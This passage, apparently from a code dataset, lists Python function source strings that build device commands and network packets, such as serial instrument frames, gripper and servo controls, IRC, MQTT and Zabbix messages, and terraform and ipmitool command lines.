\", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa + \" \"\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.warning(\n \"Not enough parameters passed for function: \"\n + str(command_tuple[0])\n + \" the command must consist of \"\n + str(csv_commands)\n + \" '\"\n + str(csv_commands[j])\n + \"' is missing! Inserted 0 instead.\"\n )\n command += \" \" + \"0\" + sepa\n\n command = command.strip(\" \").strip(\n \",\"\n ) # to get rid of last comma and space at the end if csv\n command += syntax[1]\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = str(item) + \" \" + command_item + syntax[1]\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If its just one value or no value\n string = str(command_tuple[1])\n command += string.strip() + syntax[1]\n command = command.strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command.strip())\n else:\n # If the command is not found in the device only command tuple will be send\n l.error(\n \"Command \"\n + str(command_tuple[0])\n + \" was not found in device! Unpredictable behavior may happen. No commad build!\"\n )\n return \"\"\n\n # Add a command terminator if one is needed and the last part of the syntax\n # command += device_dict.get(\"execution_terminator\",\"\")\n\n # Todo: multiple commands return\n if len(return_list) > 1:\n return return_list\n else:\n return str(return_list[0])",
"def _pack(self):\n header = struct.pack(self.PACKAGING_FORMAT, self.cmd_length)\n return header",
"def __build_command_string(self, cmd):\n cmd_string = cmd.command\n\n # if we know the number of frames that this command returns,\n # only wait for exactly that number. This avoids some harsh\n # timeouts from the ELM, thus speeding up queries.\n\n\n return cmd_string",
"def _gen_cmd(cmd, address):\n family = {4: 'inet', 6: 'inet6'}[address[0].version]\n args = ['addr', cmd, '%s/%s' % (address[0], address[1])]\n if family == 'inet' and cmd == 'add':\n args += ['brd', '+']\n args += ['dev', real_ifname]\n if family == 'inet6':\n args = ['-6'] + args\n return args",
"def _create_packet(self, request):\n\n data_len = struct.pack('<Q', len(request))\n packet = b'ZBXD\\x01' + data_len + request\n\n def ord23(x):\n if not isinstance(x, int):\n return ord(x)\n else:\n return x\n\n logger.debug('Packet [str]: %s', packet)\n logger.debug('Packet [hex]: %s', ':'.join(hex(ord23(x))[2:] for x in packet))\n return packet",
"def make_packet(self, type, data): \n return (\"{}\\x00{}\\x00{}\".format(type, data, self.ID)).encode()",
"def _build_menu_command(self, cmd):\n if COMMAND_CHAR[cmd]:\n return COMMAND_CHAR[cmd]+self._newline\n else:\n raise InstrumentProtocolException(\"Unknown command character for %s\" % cmd)",
"def _build_robovac_command(mode, command):\n mcu_ota_header_0xa5 = 0xA5\n cmd_data = (mode.value + command.value)\n\n return bytes([mcu_ota_header_0xa5, mode.value, command.value, cmd_data, 0xFA])",
"def buildCommand(self, player, game, json):",
"def build_command(device, command_tuple, single_commands=False):\n if isinstance(command_tuple, (str)):\n command_tuple = (command_tuple, \"\") # make da dummy command\n\n if command_tuple[0] in device:\n\n if isinstance(device[command_tuple[0]], dict):\n try:\n com = device[command_tuple[0]][\"command\"]\n except:\n l.error(\n \"Dict command structure recognised but no actual command found for passed order {}\".format(\n command_tuple\n ),\n exc_info=True,\n )\n return None\n else:\n com = device[command_tuple[0]]\n\n if isinstance(command_tuple[1], (str, float, int)):\n try:\n return com.format(command_tuple[1])\n except IndexError:\n l.error(\n \"You attempted to send a command with the wrong number of parameters the command structure is: {}\"\n \" but you passed: [{}] as parameter(s)\".format(\n com, command_tuple[1]\n ),\n exc_info=True,\n )\n\n elif single_commands:\n if isinstance(command_tuple[1], list) or isinstance(\n command_tuple[1], tuple\n ):\n return [com.format(single) for single in command_tuple[1]]\n else:\n l.error(\"In order to build a list command, a list has to be passed!\")\n return None\n\n elif isinstance(command_tuple[1], list) or isinstance(command_tuple[1], tuple):\n # Find occurance of {} in string if list is as long as occurance of {} then just pass otherwise join a string\n brackets_count = device[command_tuple[0]].count(\"{}\")\n if len(command_tuple[1]) == brackets_count:\n return com.format(*command_tuple[1])\n elif brackets_count == 1 and len(command_tuple[1]) > brackets_count:\n sep = device.get(\"separator\", \" \")\n return com.format(sep.join([str(x) for x in command_tuple[1]]))\n elif (\n len(command_tuple[1]) > brackets_count\n or len(command_tuple[1]) < brackets_count\n and brackets_count != 1\n ):\n l.error(\n \"Could not build command for input length {}\"\n \" and input parameters length {}. Input parameters must be of same length\"\n \" as defined in config or 1\".format(\n len(command_tuple[1]), brackets_count\n )\n )\n return None\n else:\n l.error(\n \"Could not find command {} in command list of device: {}\".format(\n command_tuple[0], device[\"Device_name\"]\n )\n )",
"def build(self, origin, token, args):\r\n # If the last argument is \"long\", package it for sending\r\n if len(args) > 0:\r\n if args[-1].find(\" \") > -1:\r\n build_last_arg = \":\" + args[-1]\r\n build_args = args[0:-1] + build_last_arg.split(\" \")\r\n else:\r\n build_args = args\r\n else:\r\n build_args = []\r\n # Build the line\r\n # Future compatibility - only send \\n\r\n ret = create_numeric(origin) + \" \" + token + \" \" \\\r\n + \" \".join(build_args) + \"\\n\"\r\n \r\n # Check we're not sending things which are protocol violations\r\n if len(ret) > 512:\r\n raise ProtocolError('Line too long to send')\r\n if not token.isupper() and not token.isdigit():\r\n raise ProtocolError('Command not in uppercase during build')\r\n \r\n return ret",
"def genCommand(self,char, command): \n\t\t\n\t\tif char == 'a':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 1\n\t\t\tcommand.rGTO = 1\n\t\t\tcommand.rSP = 255\n\t\t\tcommand.rFR = 150\n\n\t\tif char == 'r':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 0\n\n\t\tif char == 'c':\n\t\t\tcommand.rPR = 255\n\n\t\tif char == 'o':\n\t\t\tcommand.rPR = 0 \n\n\t\t#If the command entered is a int, assign this value to rPRA\n\t\ttry: \n\t\t\tcommand.rPR = int(char)\n\t\t\tif command.rPR > 255:\n\t\t\t\tcommand.rPR = 255\n\t\t\tif command.rPR < 0:\n\t\t\t\tcommand.rPR = 0\n\t\texcept ValueError:\n\t\t\tpass \n\t\t\t\n\t\tif char == 'f':\n\t\t\tcommand.rSP += 25\n\t\t\tif command.rSP > 255:\n\t\t\t\tcommand.rSP = 255\n\t\t\t\t\n\t\tif char == 'l':\n\t\t\tcommand.rSP -= 25\n\t\t\tif command.rSP < 0:\n\t\t\t\tcommand.rSP = 0\n\n\t\t\t\t\n\t\tif char == 'i':\n\t\t\tcommand.rFR += 25\n\t\t\tif command.rFR > 255:\n\t\t\t\tcommand.rFR = 255\n\t\t\t\t\n\t\tif char == 'd':\n\t\t\tcommand.rFR -= 25\n\t\t\tif command.rFR < 0:\n\t\t\t\tcommand.rFR = 0\n\n\t\treturn command",
"def _command(self, servo_id, instruction, *params):\n length = 3 + len(params)\n #print('length', length)\n \"\"\"\n checksum calculation:\n checksum = ~(ID + length+instruction+parms) if the numbers in the brackets\n are calculated and exceeded 255, then it takes the lowest one byte, \"~\"\n means Negation\n \"\"\"\n checksum = 255 - ((servo_id + length + instruction + sum(params))% 256)\n #print('checksum', checksum)\n packet = [0x55, 0x55, servo_id, length, instruction, *params, checksum]\n #print('packet', packet)\n self._serial.write(bytearray(packet))\n #print('Sending packet', packet)",
"def _buildCmd(self, cmd, cmdArg=0x00):\n res = [cmd, cmdArg]\n if self.USE_SUFFIX:\n return res + [self.CMD_SUFFIX]\n return res",
"def make_command(self):\n # self.add_root_bucket()\n\n stringa = \"tc qdisc add dev \" + self.__interface + \" root netem \"\n stringa += \"delay \" + self.latency['latency'] + \"ms \" + self.latency['jitter'] + \"ms \" + self.latency[\n 'correlation'] + \"% distribution \" + self.latency['distribution']\n stringa += \" loss \" + self.drop['probability'].__str__() + \"% \" + self.drop['correlation'].__str__() + \"%\"\n stringa += \" corrupt \" + self.corrupt['probability'].__str__() + \"% duplicate \" + \\\n self.duplicate['probability'].__str__() + \"%\"\n\n cmd = shlex.split(stringa)\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n o, e = proc.communicate(timeout=1)\n except subprocess.TimeoutExpired:\n proc.kill()\n raise RuntimeWarning(\"Old configuration not eliminated\")\n\n if e.decode('ascii') != \"\":\n if proc.returncode == 2:\n raise RuntimeWarning(e.decode('ascii') + \"\\nUsing stale configuration, wipe the old settings\")\n return str(proc.returncode)",
"def buildCommandModel ( switchSpecs, posSpecs ):\n\n #-- 1 --\n result = []\n\n #-- 2 --\n # [ result +:= strings representing the options in switchSpecs ]\n for switch in switchSpecs:\n result.append ( \"-%s\" % switch.letter )\n\n #-- 3 --\n # [ result +:= strings representing the keys in posSpecs ]\n for pos in posSpecs:\n if pos.optional:\n result.append ( \"[%s]\" % pos.key )\n else:\n result.append ( pos.key )\n if pos.repeated:\n result.append ( \"...\" )\n\n #-- 4 --\n # [ return the concatenation of the strings in result with single\n # spaces between them ]\n return \" \".join ( result )",
"def _build_simple_command(self, cmd):\n return cmd+SBE37_NEWLINE",
"def __init__(self, command=None, data_length=0, data=[]):\n if command is not None:\n self.command = command\n self.data_length = data_length\n self.data = data\n self.encode()\n else:\n self.message_length = 0\n self.command = 0\n self.data_length = 0\n self.data = []\n self.string = \"\"",
"def _build_command_prelude(class_number, verb):\n return struct.pack(\"<II\", class_number, verb)",
"def makePacket(self,dhash,index,val=None):\n msg = STX + self.addr + CMD\n if val is None:\n msgtype = DATA_READ\n else:\n msgtype = DATA_WRITE\n msg += msgtype\n payload = dhash + chr(index)\n if val is not None:\n payload += struct.pack('>I',val)\n table = {STX : ESC_STX, CR : ESC_CR, ESC : ESC_ESC}\n for i in range(len(payload)):\n if payload[i] in table:\n msg += ESC\n msg += table[payload[i]]\n else:\n msg += payload[i]\n cksum = self.checksum(self.addr+CMD+msgtype+payload)\n msg += cksum\n msg += CR\n return msg",
"def genCommand(char, command): \n \n if char == 'a':\n command = SModelRobotOutput();\n command.rACT = 1\n command.rGTO = 1\n command.rSPA = 255\n command.rFRA = 150\n\n if char == 'r':\n command = SModelRobotOutput();\n command.rACT = 0\n\n if char == 'c':\n command.rPRA = 255\n\n if char == 'o':\n command.rPRA = 0\n\n if char == 'b':\n command.rMOD = 0\n \n if char == 'p':\n command.rMOD = 1\n \n if char == 'w':\n command.rMOD = 2\n \n if char == 's':\n command.rMOD = 3\n\n #If the command entered is a int, assign this value to rPRA\n try: \n command.rPRA = int(char)\n if command.rPRA > 255:\n command.rPRA = 255\n if command.rPRA < 0:\n command.rPRA = 0\n except ValueError:\n pass \n \n if char == 'f':\n command.rSPA += 25\n if command.rSPA > 255:\n command.rSPA = 255\n \n if char == 'l':\n command.rSPA -= 25\n if command.rSPA < 0:\n command.rSPA = 0\n\n \n if char == 'i':\n command.rFRA += 25\n if command.rFRA > 255:\n command.rFRA = 255\n \n if char == 'd':\n command.rFRA -= 25\n if command.rFRA < 0:\n command.rFRA = 0\n\n return command",
"def packSimulationCommand(self, lstCommand):\n szCommand = \"\"\n szCommand = struct.pack('16si', lstCommand[0], lstCommand[1])\n szCommand += struct.pack('i', len(lstCommand[2:]))\n for i in lstCommand[2:]:\n szCommand += struct.pack('16s', i[0])\n szCommand += struct.pack('i', len(i[1:]))\n for j in i[1:]:\n szCommand += struct.pack('i', j)\n\n return szCommand",
"def buildnc(self, cmd=''):\r\n tmtcport = 21904\r\n if 'tmtcport' in self.config['ue']:\r\n tmtcport = self.config['ue']['tmtcport']\r\n\r\n nccmd = cmdObj()\r\n nccmd['cmd'] = \"echo -n \" + cmd + ' | busybox nc 127.0.0.1 ' + str(tmtcport)\r\n #FIXME: nc should be responsed quickly, hardcoded here.\r\n nccmd['timeout'] = 1\r\n return nccmd",
"def _build_direct_command(self, cmd, arg):\n return \"%s%s\" % (arg, self._newline)",
"def gen_parse_packet_source(cmd_list):\n\t#TODO: check for count == 0\n\ts = \"\"\n\ts += \"void parse_packet(uint8_t *buf, uint16_t count){\\n\"\n\ts += \"\\tuint8_t cmd = buf[0];\\n\"\n\ts += \"\\tswitch(cmd){\\n\"\n\tfor c in cmd_list:\n\t\ts += \"\\t\\t/* %s */\\n\"%(c[\"name\"])\n\t\ts += \"\\t\\tcase 0x%02X: /* (Write form) */\\n\"%c[\"code\"]\n\t\ts += \"\\t\\t\\tparse_%s(buf, \"%cannon_name(c[\"name\"])\n\t\tadd_trigger = False\n\t\tfor a in c[\"argument\"]:\n\t\t\tif a[0] == \"*\":\n\t\t\t\ts += \"DataReal.%s, \"%(a[1])\n\t\t\t\tadd_trigger = True;\n\t\t\telse:\n\t\t\t\ts += \"&(DataReal.%s), \"%(a[1])\n\t\ts = s[0:-2] + \");\\n\"\n\t\ts += \"\\t\\t\\tbuf[0] = cmd;\\n\"\n\t\ts += \"\\t\\t\\tsend_packet(buf, 1);\\n\"\n\t\tif add_trigger:\n\t\t\ts += \"\\t\\t\\t%s_trigger();\\n\"%cannon_name(c[\"name\"])\n\t\ts += \"\\t\\t\\tbreak;\\n\"\n\t\t\n\t\ts += \"\\t\\tcase 0x%02X: /* (Read form) */\\n\"%(c[\"code\"] | 0x80)\n\t\ts += \"\\t\\t\\tsend_%s(\"%cannon_name(c[\"name\"])\n\t\tfor a in c[\"argument\"]:\n\t\t\ts += \"DataReal.%s, \"%(a[1])\n\t\ts = s[0:-2] + \");\\n\"\n\t\ts += \"\\t\\t\\tbreak;\\n\"\n\ts += \"\\t\\tdefault:\\n\"\n\ts += \"\\t\\t\\tbuf[0] = 0;\\n\"\n\ts += \"\\t\\t\\tsend_packet(buf, 1);\\n\"\n\ts += \"\\t\\t\\tbreak;\\n\"\n\ts += \"\\t}\\n}\\n\"\n\treturn s\n\t#TODO: writeable stuff ",
"def net_cmd(self):\n \n logging.debug(\"net_cmd called\")\n cmd = \"\"\n # FIXME should probably grab the PrefixLength from the network definition\n # calc my router\n \n # FIXME: Need to split this into separate files...\n # files will be a dictionary of {\"filename\":\"contents\"}\n files = {}\n \n cmd = \"rem cmd\\r\\n\"\n tmpl = \"\"\"netsh interface ip set address \"%(nic)s\" static %(v4_fixed_ip)s 255.255.255.0\\r\\n\"\"\"\n # FIXME: this should be read out of the configuration, probably\n nets = self.networks\n ips = self.ip_addresses \n my_router = \"\"\n for netname in nets:\n v4_fixed_ip = ips.get(netname)\n my_net = v4_fixed_ip.split(\".\")[:3]\n my_net.append(\"254\")\n my_router = \".\".join(my_net)\n nic = \"%s-%s\" % (self.footprint.footprint_name, netname)\n logging.debug(\"Creating %s for %s\" % (nic, nets))\n # net_id = self.networks.get(netname)\n cmd = cmd + tmpl % locals()\n \n cmd += \"\"\"route -p add 192.168.1.0 MASK 255.255.255.0 %(my_router)s\\r\\n\"\"\" % locals()\n cmd += \"\"\"route -p add 192.168.2.0 MASK 255.255.255.0 %(my_router)s\\r\\n\"\"\" % locals()\n cmd += \"\"\"route -p add 192.168.3.0 MASK 255.255.255.0 %(my_router)s\\r\\n\"\"\" % locals()\n logging.debug(\"cmdfile:\\n\" + cmd)\n \n # print 50 * \"x\"\n # print cmd\n return cmd",
"def generate_command_string(self, operation, *args, **kwargs):\n cmd = [self.terraform_binary_path, operation]\n\n for key, value in kwargs.items():\n if key == \"var\":\n for varkey, varval in value.items():\n option = \"-var=\"\n option += \"'%s=%s'\" % (varkey, varval)\n cmd.append(option)\n else:\n option = \"\"\n if \"_\" in key:\n key = key.replace(\"_\", \"-\")\n\n if value == \"IsFlag\":\n option = \"-%s\" % key\n else:\n option = \"-%s=%s\" % (key, value)\n cmd.append(option)\n\n if len(args) > 0:\n for arg in args:\n cmd.append(arg)\n\n return \" \".join(cmd)",
"def create_message(self, packet):\n self._header.packet_len = len(bytes(packet))\n \n frame_bytes = super(EthernetTransport, self).create_message(packet) \n \n # Update control counter for next frame\n self._header.update_control()\n \n return bytes(frame_bytes)",
"def _BuildCommand(self, command_name, parameter_files=None, **kwargs):\n command = [YCSB_EXE, command_name, self.database]\n\n parameters = self.parameters.copy()\n parameters.update(kwargs)\n\n # Adding -s prints status which includes average throughput per sec.\n if _THROUGHPUT_TIME_SERIES.value and command_name == 'run':\n command.append('-s')\n parameters['status.interval'] = _STATUS_INTERVAL_SEC\n\n # These are passed as flags rather than properties, so they\n # are handled differently.\n for flag in self.FLAG_ATTRIBUTES:\n value = parameters.pop(flag, None)\n if value is not None:\n command.extend(('-{0}'.format(flag), str(value)))\n\n for param_file in list(self.parameter_files) + list(parameter_files or []):\n command.extend(('-P', param_file))\n\n for parameter, value in parameters.items():\n command.extend(('-p', '{0}={1}'.format(parameter, value)))\n\n return 'cd %s && %s' % (YCSB_DIR, ' '.join(command))",
"def _build_payload(self, commands, method, rpc_version=\"2.0\", api_version=1.0):\n payload_list = []\n id_num = 1\n for command in commands:\n payload = {\n \"jsonrpc\": rpc_version,\n \"method\": method,\n \"params\": {\"cmd\": command, \"version\": api_version},\n \"id\": id_num,\n }\n payload_list.append(payload)\n id_num += 1\n\n return json.dumps(payload_list)",
"def _build_command(self, code_command):\n if code_command == 'end':\n return roboc_command.RobocCommandExit()\n elif code_command[0] == 'E':\n return roboc_command.RobocMoveEast(int(code_command[1:]))\n elif code_command[0] == 'W':\n return roboc_command.RobocMoveWest(int(code_command[1:]))\n elif code_command[0] == 'S':\n return roboc_command.RobocMoveSouth(int(code_command[1:]))\n elif code_command[0] == 'N':\n return roboc_command.RobocMoveNorth(int(code_command[1:]))\n else:\n print(code_command)\n raise ValueError()",
"def _commandTemplate(self, command:dict) -> ET.Element:\n\t\tresult = ET.Element('Command')\n\t\tfor key,value in command.items():\n\t\t\tET.SubElement(result,key).text = value\n\t\treturn result",
"def post_build(self, pkt, pay):\n if self.length is None:\n pkt = struct.pack(\"!I\", len(pay) + 2) + pkt[4:]\n return pkt + pay",
"def build_command(args, parser):\n cmd = \"ipmitool -I lanplus\"\n if not args.host:\n print \"\\nERROR: hostname is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -H ' + args.host\n if args.port:\n cmd += ' -p ' + args.port\n if not args.user:\n print \"\\nERROR: username is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -U ' + args.user\n if args.passwd:\n cmd += ' -P ' + args.passwd\n cmd += ' dcmi power reading'\n if args.interval:\n global INTERVAL\n INTERVAL = args.interval\n if args.nread:\n global NREAD\n NREAD = args.nread\n else:\n global INFINITY\n INFINITY = True\n if args.store:\n global STORE\n STORE = True\n return cmd",
"def _command(self):\n command = self.subdevice.get_cmd_generic_timed(len(self.channels),\n self.scanPeriod)\n command.start_src = TRIG_SRC.int\n command.start_arg = 0\n command.stop_src = TRIG_SRC.count\n command.stop_arg = self.samples\n command.chanlist = self.channels\n # Adding to remove chunk transfers (TRIG_WAKE_EOS)\n wake_eos = _NamedInt('wake_eos', 32)\n if wake_eos not in CMDF:\n CMDF.append(wake_eos)\n command.flags = CMDF.wake_eos\n return command",
"def issue_binary_command (self, command_id, ch=None, BCAST=0, ALLCH=0, ADDM=0, RW=0, ACT=0, DEXT=0, value_int=0, addr_id_num=0x0000, n_lines_requested=2**31, target_errors=None, output_regex='(.*)', special_timeout = None):\r\n\t\t\r\n\t\t\r\n\t\tdef get_val(i):\r\n\t\t\t\"\"\"Function to convert uint16 to bytearray([uint8,uint8])\"\"\"\r\n\t\t\treturn bytearray([int(i/256),int(i)-int(i/256)*256])\r\n\t\t\r\n\t\tdef parity_odd(x):\r\n\t\t\t\"\"\"Function to compute whether a byte's parity is odd.\"\"\"\r\n\t\t\tx = x ^ (x >> 4)\r\n\t\t\tx = x ^ (x >> 2)\r\n\t\t\tx = x ^ (x >> 1)\r\n\t\t\treturn x & 1\r\n\t\t\r\n\t\t\r\n\t\t# Format header byte\r\n\t\theader_byte = 0x80\r\n\t\theader_byte += BCAST*0x40\r\n\t\theader_byte += ALLCH*0x20\r\n\t\theader_byte += ADDM*0x10\r\n\t\theader_byte += RW*0x08\r\n\t\theader_byte += ACT*0x04\r\n\t\theader_byte += DEXT*0x02\r\n\t\theader_byte += parity_odd(header_byte)\r\n\t\t\r\n\t\t\r\n\t\t# Format command byte\r\n\t\tif isinstance(command_id, str):\r\n\t\t\tcommand_byte = CMD_CODES[command_id.upper()]\r\n\t\telif isinstance(command_id, int):\r\n\t\t\tcommand_byte = command_id\r\n\t\t\r\n\t\t\r\n\t\t# Format channel address\r\n\t\taddress_bytes = bytearray()\r\n\t\tif ch is None:\r\n\t\t\tch = 0\r\n\t\tif ADDM == 1:\r\n\t\t\taddress_bytes.extend(get_val(addr_id_num))\r\n\t\t\taddress_bytes.append(ch)\r\n\t\telif ADDM == 0:\r\n\t\t\taddress_bytes.append(0)\r\n\t\t\taddress_bytes.extend(get_val(ch))\r\n\t\t\r\n\t\t\r\n\t\t# Format value bytes\r\n\t\t# value_int can be either an int or a list of ints (for vectorised input, DEXT = 1)\r\n\t\tdata_bytes = bytearray()\r\n\t\t\r\n\t\tif DEXT == 1:\r\n\t\t\t# Handle data extension length\r\n\t\t\tif isinstance(value_int, list):\r\n\t\t\t\tn_dext_words = len(value_int)\r\n\t\t\telse:\r\n\t\t\t\tn_dext_words = 1\r\n\t\t\tif n_dext_words > 0xFFFF:\r\n\t\t\t\tn_dext_words = 0xFFFF\r\n\t\t\tdata_bytes.extend(get_val(n_dext_words))\r\n\t\t\r\n\t\tif isinstance(value_int, int):\r\n\t\t\tdata_bytes.extend(get_val(value_int))\r\n\t\t\r\n\t\telif isinstance(value_int, list) and all([isinstance(e ,int) for e in value_int]):\r\n\t\t\tfor i,e in enumerate(value_int):\r\n\t\t\t\tdata_bytes.extend(get_val(e))\r\n\t\t\t\tif i == n_dext_words:\r\n\t\t\t\t\tbreak\r\n\t\t\r\n\t\telse:\r\n\t\t\traise AttributeError(\"value_int must be of type int, or of type list with all elements of type int (received type {:})\".format(type(value_int) ) )\r\n\t\t\r\n\t\t\r\n\t\t# Compose command byte string\r\n\t\ttx_str = bytearray()\r\n\t\ttx_str.append(header_byte)\t\t\t\t# Header byte\r\n\t\ttx_str.append(command_byte)\t\t\t\t# Command byte\r\n\t\ttx_str.extend(address_bytes)\t\t\t# Three bytes of channel address\r\n\t\ttx_str.extend(data_bytes)\t\t\t\t# 2 (DEXT=0) or 2*N+1 (DEXT=1) bytes of data\r\n\t\t\r\n\t\t# Transmit it\r\n\t\tself.transmit(tx_str, binary_mode = True)\r\n\t\t\r\n\t\t\r\n\t\t# Function to retry this command (in case of comms error)\r\n\t\tdef retry_function():\r\n\t\t\treturn self.issue_binary_command (command_id, ch, BCAST, ALLCH, ADDM, RW, ACT, DEXT, value_int, addr_id_num, n_lines_requested, target_errors, output_regex, special_timeout)\r\n\t\t\r\n\t\t# Wait for response\r\n\t\tif RW==1 or ((RW==0 or ACT) and self.wait_for_responses):\r\n\t\t\ttry:\r\n\t\t\t\tresult = self._issue_command_receive_response (retry_function, n_lines_requested, target_errors, output_regex, special_timeout)\r\n\t\t\t\treturn result\r\n\t\t\texcept RuntimeError as e:\r\n\t\t\t\tif RW == 1:\r\n\t\t\t\t\t# If we want a return value, raise an error\r\n\t\t\t\t\traise RuntimeError (\"Failed to read with command '{0}'. {1}\".format(tx_str, e))\r\n\t\t\t\telse:\r\n\t\t\t\t\t# If we are setting something, just warn the user\r\n\t\t\t\t\tprint(\"Qontroller.issue_command: Warning: Failed to write with command '{0}'. {1}\".format(tx_str, e))\r\n\t\t\t\t\treturn None",
"def construct_message(self):\n msg_type = self.msg_type\n if msg_type == \"PUBMSG\":\n msg_type = \"PRIVMSG\"\n ret = \"{} {}\".format(msg_type, self.target)\n if self.content:\n ret += \" :{}\".format(self.content)\n return ret + \"\\r\\n\"",
"def make_packet(message, host):\n\tRESOURCE = \"/\"\t\t\t\t# dummy resource\n\t\n\t# First line is the request\n\trequest = HTTPConstants.GET_REQUEST + \" \" + RESOURCE + \" \" + HTTPConstants.VERSION + HTTPConstants.CRLF\n\t\n\t# Next are the headers\n\theaders = \"Host: {0}\".format(host) + HTTPConstants.CRLF\n\t\n\t# Construct the head\n\thead = request + headers\n\t\n\t# Construct the body\n\tbody = message + HTTPConstants.CRLF\n\t\n\t# Assembly into a packet, where the head and body (message) are separated by a blank line (CRLF), and the EOM is\n\t# denoted by a blank line\n\treturn head + HTTPConstants.CRLF + body + HTTPConstants.CRLF",
"def _build_command_user_data_message(self, command_payload) -> LocalServerInfo_pb2.LocalServerMessage:\n magic_number = self._get_magic_number()\n message = LocalServerInfo_pb2.LocalServerMessage()\n message.magic_num = magic_number\n message.localcode = self.local_code\n message.c.type = 0\n message.c.usr_data = command_payload\n\n return message",
"def createPacket(id):\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n header = getHeaderData(0, id)\n\n data = 192 * 'Q'\n\n checksum = getChecksum(header + data)\n\n header = getHeaderData(socket.htons(checksum), id)\n\n return header + data",
"def sendScratchCommand(self, command):\n if sys.version[0] == \"2\":\n self.socket.send(self.getPacketLengthBytes(command) + command)\n elif sys.version[0] == \"3\":\n self.socket.send(self.getPacketLengthBytes(command) + command.encode('utf-8'))",
"def _generate_payload(self, command, data=None, gwId=None, devId=None, uid=None):\n json_data = command_override = None\n\n if command in payload_dict[self.dev_type]:\n if \"command\" in payload_dict[self.dev_type][command]:\n json_data = payload_dict[self.dev_type][command][\"command\"]\n if \"command_override\" in payload_dict[self.dev_type][command]:\n command_override = payload_dict[self.dev_type][command][\n \"command_override\"\n ]\n\n if self.dev_type != \"type_0a\":\n if (\n json_data is None\n and command in payload_dict[\"type_0a\"]\n and \"command\" in payload_dict[\"type_0a\"][command]\n ):\n json_data = payload_dict[\"type_0a\"][command][\"command\"]\n if (\n command_override is None\n and command in payload_dict[\"type_0a\"]\n and \"command_override\" in payload_dict[\"type_0a\"][command]\n ):\n command_override = payload_dict[\"type_0a\"][command][\"command_override\"]\n\n if command_override is None:\n command_override = command\n if json_data is None:\n # I have yet to see a device complain about included but unneeded attribs, but they *will*\n # complain about missing attribs, so just include them all unless otherwise specified\n json_data = {\"gwId\": \"\", \"devId\": \"\", \"uid\": \"\", \"t\": \"\"}\n\n if \"gwId\" in json_data:\n if gwId is not None:\n json_data[\"gwId\"] = gwId\n else:\n json_data[\"gwId\"] = self.id\n if \"devId\" in json_data:\n if devId is not None:\n json_data[\"devId\"] = devId\n else:\n json_data[\"devId\"] = self.id\n if \"uid\" in json_data:\n if uid is not None:\n json_data[\"uid\"] = uid\n else:\n json_data[\"uid\"] = self.id\n if \"t\" in json_data:\n if json_data[\"t\"] == \"int\":\n json_data[\"t\"] = int(time.time())\n else:\n json_data[\"t\"] = str(int(time.time()))\n\n if data is not None:\n if \"dpId\" in json_data:\n json_data[\"dpId\"] = data\n elif \"data\" in json_data:\n json_data[\"data\"] = {\"dps\": data}\n else:\n json_data[\"dps\"] = data\n elif self.dev_type == \"type_0d\" and command == DP_QUERY:\n json_data[\"dps\"] = self.dps_to_request\n\n if json_data == \"\":\n payload = \"\"\n else:\n payload = json.dumps(json_data)\n # if spaces are not removed device does not respond!\n payload = payload.replace(\" \", \"\").encode(\"utf-8\")\n self.debug(\"Sending payload: %s\", payload)\n\n return MessagePayload(command_override, payload)",
"def build_message(self, dict_of_tuples, command, uuid, transaction_id=b'\\x00'):\n\t\t# NOTE: uuid must be a byte array\n\t\t# available app_message commands:\n\t\tapp_messages = {\n\t\t\t\"PUSH\": b'\\x01',\n\t\t\t\"REQUEST\": b'\\x02',\n\t\t\t\"ACK\": b'\\xFF',\n\t\t\t\"NACK\": b'\\x7F'\n\t\t}\n\t\t# finally build the entire message\n\t\tapp_message = OrderedDict([\n\t\t\t(\"COMMAND\", app_messages[command]),\n\t\t\t(\"TRANSACTIONID\", transaction_id),\n\t\t\t(\"UUID\", uuid),\n\t\t\t(\"DICT\", ''.join(dict_of_tuples.values()))\n\t\t])\n\t\treturn ''.join(app_message.values())",
"def build_packets(self):\n from scapy.all import IP, TCP\n return IP()/TCP()",
"def _read_packet_from_device(self, adb_info):\n msg = self._read_bytes_from_device(constants.MESSAGE_SIZE, adb_info)\n cmd, arg0, arg1, data_length, data_checksum = unpack(msg)\n command = constants.WIRE_TO_ID.get(cmd)\n\n if not command:\n raise exceptions.InvalidCommandError(\"Unknown command: %d = '%s' (arg0 = %d, arg1 = %d, msg = '%s')\" % (cmd, int_to_cmd(cmd), arg0, arg1, msg))\n\n if data_length == 0:\n return command, arg0, arg1, b\"\"\n\n data = self._read_bytes_from_device(data_length, adb_info)\n actual_checksum = checksum(data)\n if actual_checksum != data_checksum:\n raise exceptions.InvalidChecksumError(\"Received checksum {} != {}\".format(actual_checksum, data_checksum))\n\n return command, arg0, arg1, data",
"def send_simple_command(self, cmd):\n pkt = MqttPkt()\n \n pkt.command = cmd\n pkt.remaining_length = 0\n \n ret = pkt.alloc()\n if ret != NC.ERR_SUCCESS:\n return ret\n \n return self.packet_queue(pkt)",
